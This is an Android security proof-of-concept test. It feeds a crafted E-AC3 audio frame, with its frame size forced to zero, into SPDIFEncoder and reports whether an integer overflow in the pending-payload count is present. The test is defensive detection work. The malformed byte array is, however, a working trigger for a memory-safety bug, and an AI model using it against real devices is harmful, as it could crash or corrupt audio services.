/**
 * Copyright (C) 2022 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#include <stdlib.h>
#include <audio_utils/spdif/SPDIFEncoder.h>
#include "../includes/common.h"

// Taken as a reference from audio_utils/tests/spdif_tests.cpp "MySPDIFEncoder"
class PocSPDIFEncoder : public android::SPDIFEncoder {
 public:

    explicit PocSPDIFEncoder(audio_format_t format)
            : SPDIFEncoder(format) {
    }

    PocSPDIFEncoder() = default;

    size_t getBurstBufferSizeBytes() const {
        return mBurstBufferSizeBytes;
    }

    size_t getByteCursor() const {
        return mByteCursor;
    }

    android::FrameScanner *getFramer() const {
        return mFramer;
    }

    size_t getPayloadBytesPending() const {
        return mPayloadBytesPending;
    }

    ssize_t writeOutput(const void*, size_t numBytes) override {
        mOutputSizeBytes = numBytes;
        return numBytes;
    }

    size_t mOutputSizeBytes = 0;
};

int main() {
    PocSPDIFEncoder encoder(AUDIO_FORMAT_E_AC3);

    // Beginning of the file channelcheck_48k6ch.eac3 with frame size
    // forced to zero
    uint8_t buf[] = { 0x0B, 0x77, 0x00, 0x00, 0x3F, 0x85, 0x7F, 0xE8, 0x1E,
            0x40, 0x82, 0x10, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x03,
            0xFC, 0x60, 0x80, 0x7E, 0x59, 0x00, 0xFC, 0xF3, 0xCF, 0x01, 0xF9,
            0xE7 };
    encoder.write(buf, sizeof(buf));

    size_t bufferSize = encoder.getBurstBufferSizeBytes();

    // If vulnerability is present, 'mPayloadBytesPending' will be assigned
    // a large overflowed value
    size_t pendingBytes = encoder.getPayloadBytesPending();

    // 'mBurstBufferSizeBytes' shouldn't be lesser than 'mPayloadBytesPending',
    // this will happen if 'mPayloadBytesPending' holds a overflowed value
    return (bufferSize < pendingBytes) ? EXIT_VULNERABLE : EXIT_SUCCESS;
}